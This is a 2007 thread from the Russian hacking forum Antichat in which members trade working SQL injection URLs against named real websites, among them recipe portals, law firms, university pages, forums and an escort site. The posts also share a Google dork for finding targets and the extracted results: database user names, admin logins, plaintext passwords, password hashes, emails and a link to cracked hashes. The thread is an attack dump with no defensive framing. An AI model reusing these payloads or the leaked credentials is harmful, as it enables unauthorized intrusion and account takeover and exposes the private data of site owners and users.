Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.10.2007, 11:42
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Уязвимость в Softbiz Recipes Portal Script:
Уязвимость существует из-за недостаточной обработки входных данных в параметре «sbcat_id» сценарием searchresult.php.
Поиск в гугл: inurl:"searchresult.php?sbcat_id="
Пример: _http://recept.promolist.ru
[sql-inj]
Код:
_http://recept.promolist.ru/searchresult.php?sbcat_id=12345%20union/**/select/**/0,concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
Таблицы:
Код:
_http://recept.promolist.ru/searchresult.php?sbcat_id=12345%20union/**/select/**/0,concat(version(),0x3a,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,21,22/**/from/**/information_schema.tables/*
Колонки:
Код:
_http://recept.promolist.ru/searchresult.php?sbcat_id=12345%20union/**/select/**/0,concat(version(),0x3a,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,column_name,17,18,19,20,21,22/**/from/**/information_schema.columns/*
Админ:
Код:
http://recept.promolist.ru/searchresult.php?sbcat_id=12345%20union/**/select/**/0,concat(version(),0x3a,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(sbadmin_name,0x3a,sbadmin_pwd),17,18,19,20,21,22/**/from/**/sbrecipe_admin/*
|
|
|
16.10.2007, 16:44
|
|
Познающий
Регистрация: 31.07.2006
Сообщений: 46
Провел на форуме:
596615
Репутация:
18
|
|
http://www.daev-plaza.ru/
В поле поиска вводим
Код:
-1+union+select+1,2,password,4,5,6,7,8,9,10,11,name,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+admin/*
5 админов :
dima:1
root:
Gasiev opcorn
az:
roman:rhdvny
Но в админку не папал 
|
|
|
|
16.10.2007, 16:54
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.galerialeme.com/exposicoes_textos.php?lang=ing&id=88&text_id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3/*
galerialeme@200.234.200.3:4.0.27-locaweb-log:galerialeme
Код:
http://www.christophkeller.com/films_view.php?text_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12/*&id=11
pierre_keller@localhost:4.1.22-standard-log:pierre_keller
Код:
http://www.christophkeller.com/films_view.php?text_id=-1+union+select+1,aes_decrypt(aes_encrypt(login,0x71),0x71),3,aes_decrypt(aes_encrypt(password,0x71),0x71),5,6,7,8,9,10,11,12+from+users/*&id=11
keller:helioflex pierre:cachou
Код:
http://www.nomen.com/index.php?language_id=2&menu_id=4&text_id=-1+union+select+concat(user(),0x3a,version(),0x3a,database())/*
root@localhost:4.0.26-nt:nomen
Код:
http://www.nomen.com/index.php?language_id=2&menu_id=4&text_id=-1+union+select+concat(user,0x3a,password)+from+mysql.user/*
root:1e30d6d6558d5312
Код:
http://www.ms-chat.com/magazine/article.show.php?text_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9/*
doolao@81.169.177.180:5.0.32-Debian_7etch1-log:doolao
Код:
http://www.ms-chat.com/magazine/article.show.php?text_id=-1+union+select+1,2,3,concat(username,0x3a,user_password,0x3a,user_email),5,6,7,8,9+from+phpbb_users/*
весомый вывод =) да и портал популярный |
|
|
|
16.10.2007, 18:45
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://lawfirm.ru/news/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(user(),0x3a,version(),0x3a,database()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
root@pm9:4.0.24:lawf
Код:
http://lawfirm.ru/news/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(user,0x3a,password),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+mysql.user+limit+0,1/*
root:17f62162237a6ce9
Код:
http://www.cultspace.org/viewHolyTextComments.php?text_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())/*
cultspac_root@localhost:4.1.22-standard-log:cultspac_production
Код:
http://www.escortenpriveontvangst.nl/index.php?open=list.php&sex_id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,concat(user(),0x3a,version(),0x3a,database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/*
escort@localhost:4.1.20-log:escort_escort
Код:
http://www.escortenpriveontvangst.nl/index.php?open=list.php&sex_id=-1'/**/union/**/select/**/1,2,3,4,5,6,7,concat(username,0x3a,user_password,0x3a,user_email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/**/from/**/phpbb_users/*
escortenpriveontvangst:5d1b83c5157b695ff205ab741e4 a2609:info@escortenpriveontvangst.nl
Код:
http://www.nightnday.org/detail.php?list_id=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
atom_nightnday@localhost:5.0.22:nightnday |
|
|
|
16.10.2007, 21:14
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
http://recept.promolist.ru/searchresult.php?sbcat_id=%20999999%20union/**/select/**/0,sbadmin_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,s badmin_pwd,17,18,19,20,21,22/**/from/**/sbrecipe_admin/*
admin KAPACb
|
|
|
|
16.10.2007, 23:08
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
raum.ru
http://www.raum.ru/articles.php?id=-1'+union+select+1,2,3,4,5,concat(name,0x3a,passwor d,0x3a,icq_number),7,8+from+vitz_forums.ibf_member s/*
логин\хеш\уин используется базе, что и на vitz.ru , скулю к которому я выкладывал ранее.
http://rapidshare.com/files/62099632/hashes.rar.html - тут расшифровка хешей ( спасибо delay(0)'ю )
-------------------------------------------------------------
externat.kspu.ru
http://externat.kspu.ru/forum/thread.php?threadid=298&topicid=-1+union+select+concat(version(),0x2F,database(),0x 2F,user())/*
4.0.24_Debian-10sarge2-log/externat/root@localhost
http://externat.kspu.ru/forum/thread.php?threadid=298&topicid=-1+union+select+concat(user_login,0x2F,user_passwor d)+from+users+limit+0,1/*
логин\хеш
|
|
|
|
17.10.2007, 11:16
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642
Репутация:
569
|
|
УкрТяжМет
форум почитателей тяжелой музыки 
http://utm.in.ua/bands.php?mode=band&bid=-1319+union+select+1,concat_ws(0x3C62723E,username, user_icq,user_password,user_email),3,4,5,char(0x63 ,0x72,0x61,0x63,0x6b,0x65,0x64,0x20,0x62,0x79,0x20 ,0x66,0x6f,0x62,0x6f,0x66,0x6f,0x62,0x20,0xa9,0x20 ,0x28,0x41,0x6e,0x74,0x69,0x63,0x68,0x61,0x74,0x29 ),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32+from+utm_users+limit+48 14,1/*
|
|
|
|
17.10.2007, 13:35
|
|
Новичок
Регистрация: 16.09.2007
Сообщений: 25
Провел на форуме:
120760
Репутация:
62
|
|
Код:
http://www.marimedia.ru/news.php?news=-1+union+select+1,2,3,4,concat_ws(0x3a,converge_id,converge_pass_hash,converge_pass_salt,converge_email),6,7,8,9,10,11+from+marimediaru_forum.ibf_members_converge+limit+0,1
http://www.castledragmire.com/ragnarok/forums/forum.php?id=-1+union+select+1,2,concat_ws(0x203a20,name,password,icq,email),4,5,6,7,8,9,10+from+users/*
|
|
|
|
17.10.2007, 20:57
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
webdive.ru
http://www.webdive.ru/diveclub.php?a=1&id_town=-126+union+select+concat(version(),0x3a,database(), 0x3a,user()),2/*
5.0.27:nas3ru_dive:nas-3ru@81.177.16.91
http://www.webdive.ru/diveclub.php?a=1&id_town=-126+union+select+concat(name,0x2F,pass),2+from+fus er+limit+0,1/*
логин\пароль не хешированный ))
|
|
|
|
17.10.2007, 21:08
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.lvkrk.ee/index.php?task=galerii_teemad&list_id=9999999/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*
root@localhost:4.0.20-log:kodu
Код:
http://www.lvkrk.ee/index.php?task=galerii_teemad&list_id=9999999/**/union/**/select/**/1,2,3,concat(user,0x3a,password),5+from+mysql.user/*
root:157cda3a54492a1e
phpgw:157cda3a54492a1e
admin:73a3bfe82d187e5b
phpgroupware:1a23abc3400d85c1
Код:
http://www.onlineitools.com/nl/nl-archive.php?bus_id=-1+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71)/*&list_id=1
4.1.9-standard-log
Код:
http://www.gtreview.com/events/event_detail.php?List_ID=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
exporta@localhost:4.1.20-log:dbExporta
Код:
http://202.205.109.23/new_wish/new_word.php?info_kind=2&list_id=-1+union+select+1,2,3,4,concat(user,0x3a,password)+from+mysql.user/*
root:0af0288503451485
Код:
http://www.librariacarter.ro/edituri.php?e_id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*
libraria@localhost:4.1.20:libraria
Код:
http://www.agenda.unizh.ch/liste.php?list_type=reihe&list_id=-1+union+select+1,2,aes_decrypt(aes_encrypt(user(),0x71),0x71),4,5,6,aes_decrypt(aes_encrypt(database(),0x71),0x71),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,aes_decrypt(aes_encrypt(version(),0x71),0x71),36,37,38,39,40,41,42/*
ibis@idwww02.unizh.ch 5.0.18-Max ibis
Код:
http://www.mercatigenerali.org/eventi_detail.php?e_id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11/*
Sql68148@62.149.140.36:4.0.27-standard-log:Sql68148_1 |
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
